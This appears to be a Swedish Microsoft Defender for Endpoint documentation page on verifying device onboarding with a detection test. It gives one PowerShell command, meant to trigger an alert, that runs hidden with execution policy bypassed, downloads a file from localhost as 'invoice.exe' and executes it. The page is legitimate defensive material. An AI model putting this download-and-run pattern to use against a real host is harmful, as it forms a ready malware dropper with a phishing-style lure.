Kör ett identifieringstest på en enhet som nyligen registrerats för att Microsoft Defender för Endpoint
Gäller för:
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server 2022
- Windows Server 2025 (med början i februari 2025 och lanseras under de kommande veckorna)
- Microsoft Defender för Endpoint plan 1 och 2
- Microsoft Defender XDR
Vill du uppleva Microsoft Defender för Endpoint? Registrera dig för en kostnadsfri utvärderingsversion.
När du lägger till en enhet i Microsoft Defender för Endpoint-tjänsten för hantering kallas den registrering. Med onboarding kan enheter rapportera signaler om sin hälsostatus till tjänsten.
Att kontrollera att en enhet har lagts till i tjänsten är ett viktigt steg i hela distributionsprocessen. Det säkerställer att alla enheter som förväntas hanteras.
Verifiera Microsoft Defender för Endpoint registrering av en enhet med hjälp av ett PowerShell-identifieringstest
Kör följande PowerShell-skript på en nyligen registrerad enhet för att kontrollera att den rapporterar korrekt till Defender för Endpoint-tjänsten.
Öppna Kommandotolken som administratör på enheten.
Kopiera och kör följande kommando i prompten:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
Kommandotolken stängs automatiskt. Om det lyckas visas en ny avisering i portalen för den registrerade enheten på cirka 10 minuter.
Obs!
Du kan också använda EICAR-teststrängen för att utföra det här testet. Du får ett meddelande på slutpunkten och en avisering i Microsoft Defender-portalen.
Relaterade artiklar
- Registrera Windows-enheter
- Registrera servrar
- Felsöka Microsoft Defender för Endpoint onboarding-problem
Tips
Vill du veta mer? Engage med Microsofts säkerhetscommunity i vår Tech Community: Microsoft Defender för Endpoint Tech Community.